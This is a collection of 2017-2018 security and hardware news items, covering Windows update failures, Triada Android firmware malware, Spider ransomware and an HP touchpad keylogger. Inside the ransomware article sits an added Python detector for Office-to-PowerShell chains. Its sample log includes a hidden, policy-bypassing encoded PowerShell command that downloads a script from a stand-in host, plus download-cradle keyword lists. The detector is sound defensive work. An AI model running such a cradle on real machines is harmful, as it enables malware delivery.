Windows 10 Cumulative Update KB4090913 Fails to Install, Causes Other Issues

March 7, 2018

This update is only shipped to Fall Creators Update machines

Microsoft rolled out Windows 10 cumulative update KB4090913 for systems running Fall Creators Update (version 1709) yesterday to fix a USB device connectivity problem, but as it turns out, the same update also causes some more issues on a number of machines.

At this point, there are isolated reports of failed installs hitting Windows 10 cumulative update KB4090913, and just like it happened with previous CUs, users are complaining of an error reading “We could not complete the update, reverting changes” with code 0x80070643.

Afterward, systems are automatically re-offered the update with another failed install attempt, so they’re pushed into an infinite loop that doesn’t stop until the patch itself is completely hidden and blocked on Windows 10.

“Can’t find the cause and now stuck on Windows Update downloading the update again, and if I restart to try and install it, it’s the same on repeat. Fails to install and reverting back,” one user explained on Reddit.

Some suggest there’s an issue with AMD processors running the latest versions of Windows 10, though Microsoft doesn’t specifically list any known issues with such hardware.

New cumulative updates coming next week

In addition to the typical failed installs hitting cumulative updates, KB4090913 also causes other problems, including USB devices no longer working correctly after the install.

“Careful guys, it broke my mouse Logitech G502 until I uninstalled the update. More or less made everything on my desktop unclickable,” one user explained, while another one confirmed the bug with the same mouse, adding that they occasionally get a BSOD.

While Microsoft originally said cumulative update KB4090913 only fixes an issue with USB devices, the changelog has since been quietly updated to reveal that it also resolves a bug causing some devices to fail to boot with an INACCESSIBLE_BOOT_DEVICE error.

At the time of writing this article, there are no new known issues added to the KB page.
With Patch Tuesday kicking off next week and more cumulative updates likely to be released, expect fixes aimed at today’s bugs to be included in the rollout.



Android Phones Caught Selling with Pre-Installed Factory Malware

March 5, 2018

Malware injected in firmware of more than 40 models

More than 40 Android phone models, most of them manufactured by companies in China, ship with pre-installed malware that was injected into the firmware straight from the factory.

Security company Dr. Web says that it came across a new Trojan called Android.Triada.231 in the firmware of several Android devices back in mid-2017, and after in-depth research, it discovered that over 40 models are likely to be affected.

Most of the compromised phones are in the low-end category, and they include devices from Leagoo, Doogee, Umi, and Cubot.
Newer models include the Leagoo M9 launched in December.

Dr. Web explains that it contacted the affected companies to report the problem, and it discovered that at least in one case, the culprit was a partnership with a software developing company in Shanghai which required Android OEMs to pre-install one of its apps into the image of the mobile operating system.

Stealing confidential information

As for how dangerous the malware can be for Android users purchasing these phones, the security firm says it can steal confidential information, like banking data and personal details.

“These Trojans infect the process of an important Android system component, Zygote. This process is used to launch all applications. Once the Trojans inject into this module, they penetrate other running applications,” Dr. Web explains in its analysis.

“In doing so, they obtain the ability to carry out various malicious activities without a user’s intervention: they covertly download and launch software. The key feature of Android.Triada.231 is that cybercriminals inject this Trojan into the system library. They do not distribute the Trojan as a separate program. As a result, the malicious application penetrates the device firmware during manufacture. Users receive their devices already infected from the box.”

The security company warns that the number of Android phones possibly shipping with the same malware could be bigger, though for the time being, only the models below have been confirmed to be compromised.

Removing the malware from a phone isn’t possible without installing a clean version of the operating system, in which case the manufacturer is the only one that can help.
If the device is rooted, security applications can help clean the infection.

Leagoo M5
Leagoo M5 Plus
Leagoo M5 Edge
Leagoo M8
Leagoo M8 Pro
Leagoo Z5C
Leagoo T1 Plus
Leagoo Z3C
Leagoo Z1C
Leagoo M9
ARK Benefit M8
Zopo Speed 7 Plus
Doogee X5 Max
Doogee X5 Max Pro
Doogee Shoot 1
Doogee Shoot 2
Tecno W2
Homtom HT16
Umi London
Kiano Elegance 5.1
iLife Fivo Lite
Mito A39
Vertex Impress InTouch 4G
Vertex Impress Genius
myPhone Hammer Energy
Advan S5E NXT
Advan S4Z
Advan i5E
Tesla SP6.2
Cubot Rainbow
Haier T51
Cherry Mobile Flare S5
Cherry Mobile Flare J2S
Cherry Mobile Flare P1
Pelitt T1 PLUS
Prestigio Grace M5 LTE
BQ 5510


Windows Chrome users: Tech-support scams try new trick to freeze your browser

February 7, 2018

Get an ad-blocker if you want to dodge tech-support scammers’ latest rapid-download ruse.

Tech-support scammers have developed a new trick to freeze browsers on a bogus security alert with a number to a fake support line.

The ultimate goal of the browser freeze is to cause stress to lots of potential victims in the hope some will call the bogus hotline offered in the alert.

Previously, tech-support scams have used pop-under windows, pop-up loops, and other shady techniques that aim to prevent users from closing the bogus security alert page.
Scammers frequently use malicious ads to nudge browser users to booby-trapped webpages that freeze the browser.

A new technique found by researchers at Malwarebytes targets the current version of Chrome, 64.0.3282.140, on Windows.

This scam works by instructing the browser to rapidly download thousands of files from the web, which quickly results in Chrome becoming unresponsive and makes it impossible to close tabs or the window by clicking the X button.

Malwarebytes’ Jerome Segura said that the booby-trapped pages in this case include code that abuses a web API meant for saving files from the web to disk through the browser.

The code is set to download ‘blob’ objects at half-second intervals, leading to a huge number of concurrent downloads that causes the browser to freeze and a large spike in CPU and memory usage.

Segura contends that, given most of these browser lockers reach users via malvertising, one effective method of countering the threat is to use an ad-blocker.

He also notes that people who have landed on one of these pages can escape them by going to the Windows Task Manager and force quitting the offending browser processes.

Chrome is often targeted because of its huge number of users, making it ideal for indiscriminate and widespread attacks that are usually delivered by malicious ads.


HP Pulls Spectre Security Update Due to Intel Bug

January 24, 2018

BIOS updates suspended due to patch issues

Intel has recently confirmed that its Spectre (Variant 2) patch could cause system reboots and other issues on computers installing it, and the company recommended against installing it until a workaround is provided.

As a consequence, other companies that shipped firmware updates including Intel’s patches are now forced to suspend them as well in order to prevent these issues from hitting their devices.

After Dell published an advisory recommending that users avoid installing the latest BIOS updates and downgrade to the previous release, HP has done the same, announcing that it pulled its latest patches because of the said issues.

“Intel has updated their security advisory recommending to stop deployment of current versions of the MCU patch as they may introduce higher than expected reboots and other unpredictable system behavior,” HP says in an advisory on its website.

Intel says it’s sorry for the millionth time this year

The company goes on to explain that it is removing HP BIOS SoftPaqs containing Intel microcode patches from its download center and will reissue patches that include the previous Intel microcode starting January 25.
HP will wait until Intel publishes new updates and will then reissue the BIOS updates as well, it says.

Intel apologized for the blunder earlier this week, as it acknowledged issues caused by its security updates on Broadwell, Haswell, and even new platforms.
The company says it has already identified the root cause for the bug, and says that it’s currently in the process of developing a solution to address it.

“We recommend that OEMs, cloud service providers, system manufacturers, software vendors and end users stop deployment of current versions, as they may introduce higher than expected reboots and other unpredictable system behavior,” Intel says.

Without patches, users are recommended to stay away from unknown sites and content that could try to exploit the Spectre Variant 2 vulnerability.
There are no known attacks at this point, companies say.


HP laptop batteries overheating leads to recall

January 6, 2018

Laptops sold between December 2015 and December 2017 may be powered by a battery that’s prone to overheating or even melting.

If you own a laptop, you already have the Meltdown and Spectre security flaws to worry about. If you own an HP laptop, add another potential woe to your list.

A small number of HP laptops and mobile workstations shipped between December 2015 and December 2017 will need their batteries replaced because they have a “potential to overheat, posing a fire and burn hazard,” the company said Thursday.
These batteries are sealed within the laptop, which means their removal and replacement is not a DIY job.

“This action pertains to approximately 0.1 percent of the HP systems sold globally over the past two years,” an HP spokesperson said. “We are taking immediate action to address this issue including a voluntary recall and replacement of the batteries.”

According to the US Consumer Product Safety Commission, the recall affects more than 52,000 laptops and mobile workstations.

HP will send those impacted a free battery replacement, as well as help arrange an appointment to get it replaced.
If you own an HP laptop or workstation, you can check here to see if your unit is affected.
HP released the table below showing which models are prone to the fault.

Issues with battery safety and longevity have long haunted the tech industry.
Among the more recent fiascoes have been Samsung’s overheating phone batteries in 2016 and Apple’s attempts to deal with limping batteries revealed last month.

HP’s recall comes after eight reports of batteries “overheating, melting or charring,” according to the Consumer Product Safety Commission.
One of these incidents led to a first-degree burn on someone’s hand, the commission said, while three caused property damage of up to $4,500.


New Spider ransomware threatens to delete your files if you don’t pay within 96 hours

December 12, 2017

Attackers behind new ransomware campaign are offering a “really easy” tutorial video in order to ensure they make money from their criminal activities.

A new form of ransomware has emerged and is being distributed through malicious Office documents, infecting victims with file-encrypting malware.

Uncovered by researchers at Netskope, the ‘Spider Virus’ ransomware campaign was first detected on December 10 and is ongoing.

Like many ransomware schemes, the attack begins with malicious emails to potential victims.
The email subjects and the lure documents indicate the attackers are keen on targeting victims in the Balkans.
It’s currently unknown where the attackers are operating from.

The malicious Microsoft Office attachment contains obfuscated macro code which — if macros are enabled — allows a PowerShell script to download the first stage of the ransomware payload from a host website.

Following this, the PowerShell script decodes a Base64 string and carries out further decoding steps to produce the final payload, an .exe file which contains the Spider ransomware encryptor.

PowerShell then launches the encryptor, encrypting the user’s files, adding a ‘.spider’ extension to them and then displaying a ransom note.
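The macro-to-PowerShell-to-payload chain described above is exactly what process-creation telemetry should surface. The following Python is an added example, not code from the article or from Netskope: it scans a few constructed, simplified process-creation log lines (the line format, the field names, the host name and the sample commands are all assumptions) for an Office process spawning PowerShell, an encoded command (which it decodes, since PowerShell’s -EncodedCommand expects Base64 of UTF-16LE text), a download cradle and a hidden window, and rates each hit.

```python
"""Flag the Office -> PowerShell -> Base64 download chain in process-creation logs.

Added example, not from the article or Netskope. The log format below is a
constructed simplification of a process-creation event:
    <timestamp> parent=<image> image=<image> cmdline=<command line>
"""
import base64
import re
from typing import Dict, List, Optional

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Substrings typical of a first-stage download cradle (compared lower-cased).
DOWNLOAD_HINTS = ("downloadstring", "downloadfile", "invoke-webrequest",
                  "net.webclient", "start-bitstransfer")

LINE_RE = re.compile(r"^(?P<ts>\S+) parent=(?P<parent>\S+) image=(?P<image>\S+) cmdline=(?P<cmdline>.*)$")
# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob (longest alternative first).
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)


def decode_encoded_command(b64: str) -> Optional[str]:
    """PowerShell's -EncodedCommand carries Base64 of UTF-16LE text; return it or None."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:  # binascii.Error is a subclass of ValueError
        return None
    return raw.decode("utf-16-le", errors="replace")


def analyse_line(line: str) -> Optional[Dict]:
    """Return a finding dict for one log line, or None if the line does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    parent, image, cmdline = m["parent"].lower(), m["image"].lower(), m["cmdline"]
    reasons: List[str] = []
    decoded = None
    if parent in OFFICE_PARENTS and image in SHELLS:
        reasons.append("office-parent-spawned-shell")
    enc = ENC_RE.search(cmdline)
    if enc:
        decoded = decode_encoded_command(enc.group(1))
        reasons.append("encoded-command")
    # Look for the cradle both in the visible command line and in the decoded payload.
    haystack = (cmdline + " " + (decoded or "")).lower()
    if any(hint in haystack for hint in DOWNLOAD_HINTS):
        reasons.append("download-cradle")
    if HIDDEN_RE.search(cmdline):
        reasons.append("hidden-window")
    return {"ts": m["ts"], "parent": parent, "image": image,
            "reasons": reasons, "decoded": decoded}


def severity(reasons: List[str]) -> str:
    """Office spawning a shell that also decodes or downloads something is the Spider shape."""
    office = "office-parent-spawned-shell" in reasons
    if office and ("encoded-command" in reasons or "download-cradle" in reasons):
        return "high"
    if office or "download-cradle" in reasons:
        return "medium"
    return "low" if reasons else "none"


def scan(lines: List[str]) -> List[Dict]:
    """Return findings (with severity) for every line that triggered at least one reason."""
    findings = []
    for line in lines:
        result = analyse_line(line)
        if result and result["reasons"]:
            result["severity"] = severity(result["reasons"])
            findings.append(result)
    return findings


# --- Constructed sample data: host name, paths and commands are made up ---
STAGE1_CMD = "(New-Object Net.WebClient).DownloadString('http://payload.example.invalid/stage1.ps1')"
STAGE1_B64 = base64.b64encode(STAGE1_CMD.encode("utf-16-le")).decode("ascii")
BENIGN_B64 = base64.b64encode("Get-Date".encode("utf-16-le")).decode("ascii")

SAMPLE_LOG = [
    r"2017-12-10T09:14:02Z parent=explorer.exe image=WINWORD.EXE cmdline=WINWORD.EXE /n C:\Users\alice\Downloads\invoice.doc",
    "2017-12-10T09:14:07Z parent=WINWORD.EXE image=powershell.exe cmdline=powershell.exe -nop -w hidden -ep bypass -enc " + STAGE1_B64,
    "2017-12-10T09:20:31Z parent=explorer.exe image=powershell.exe cmdline=powershell.exe -NoProfile -Command Get-Service",
    "2017-12-10T09:31:00Z parent=cmd.exe image=powershell.exe cmdline=powershell.exe -EncodedCommand " + BENIGN_B64,
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['severity']:6} {f['parent']} -> {f['image']} {f['reasons']}")
        if f["decoded"]:
            print("    decoded:", f["decoded"])
```

Run against the constructed lines, the Word-spawned PowerShell with an encoded download cradle and a hidden window rates "high", the administrator’s encoded Get-Date rates only "low", and the two ordinary lines produce no finding. The decoding step matters in practice: the cradle string never appears in the raw command line of the second event, so a detection that only grepped the visible text would miss it.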

The note tells the victim they’ve been infected with the Spider Virus and that they need to make a bitcoin payment for “the right key” in order to get their files back.

The attackers also issue a threat that if the payment isn’t received within 96 hours, their files will be deleted permanently.
They add victims shouldn’t “try anything stupid” as the ransomware has “security measures” which delete the files if the victim tries to retrieve them without paying the ransom.

The Spider ransomware note is available in two languages.

An additional note provides the victim with instructions on how to download the Tor browser required to access the payment site, how to generate a decryption tool, and how to purchase bitcoin.

“This may seem complicated to you, actually it’s really easy,” the note says — adding that there’s also a video tutorial inside a ‘help section’.
It’s common for ransomware distributors to provide this sort of ‘service’ to victims, because if the victims can’t pay the ransom, the criminals won’t make money from their campaign.

The attackers behind Spider offer a tutorial video to victims to ensure that they can buy bitcoin to pay the ransom.

The Spider ransomware is still being distributed in what researchers refer to as a “mid-scale campaign”.

As well as educating employees about the danger of ransomware and backing up critical files, businesses can protect themselves from becoming infected by Spider — and many other forms of file-encrypting malware — by removing macros, which are used as an attack vector.

“In addition to disabling macros by default, users must also be cautious of documents that only contain a message to enable macros to view the contents and also not to execute unsigned macros and macros from untrusted sources,” said Netskope’s Amit Malik.

Because Spider is a brand new form of ransomware, there’s currently no free decryption tool available for victims to retrieve files.


Keylogger uncovered on hundreds of HP PCs

December 11, 2017

For the second time this year, HP has been forced to issue an emergency fix for pre-installed keylogger software.

Hewlett Packard has issued an emergency patch to resolve a driver-level keylogger discovered on hundreds of HP laptops.

The bug was discovered by Michael Myng, also known as “ZwClose.”
The security researcher was exploring the Synaptics Touchpad SynTP.sys keyboard driver and how laptop keyboards were backlit and stumbled across code which looked suspiciously like a keylogger.

In a blog post, ZwClose said the keylogger, which saved scan codes to a WPP trace, was found in the driver.

While logging was disabled by default, it could be enabled, given the right permissions, by changing registry values; so should a laptop be compromised by malware, malicious code — including Trojans — could take advantage of the keylogging capability to spy on users.

“I messaged HP about the finding,” Myng said. “They replied terrifically fast, confirmed the presence of the keylogger (which actually was a debug trace) and released an update that removes the trace.”

HP has acknowledged the issue.
In a security advisory, HP said:

“A potential security vulnerability has been identified with certain versions of Synaptics touchpad drivers that impacts all Synaptics OEM partners.

A party would need administrative privileges in order to take advantage of the vulnerability.
Neither Synaptics nor HP has access to customer data as a result of this issue.”

A CVSS score of 6.1 has been issued, together with updated firmware and drivers for hundreds of laptops, both commercial and consumer.

Affected products include HP G2 Notebooks, the HP Elite x2 1011 G1 tablet, HP EliteBooks, HP ProBooks, and HP ZBook models, among others.

The researcher said that a fix will also be included in Windows Update.

Back in May, security firm Modzero discovered a keylogger in the Conexant HD audio driver package, installed in dozens of HP devices.
HP quickly rolled out a patch which resolved the issue, which could be used to collect data including passwords, website addresses, and private messages.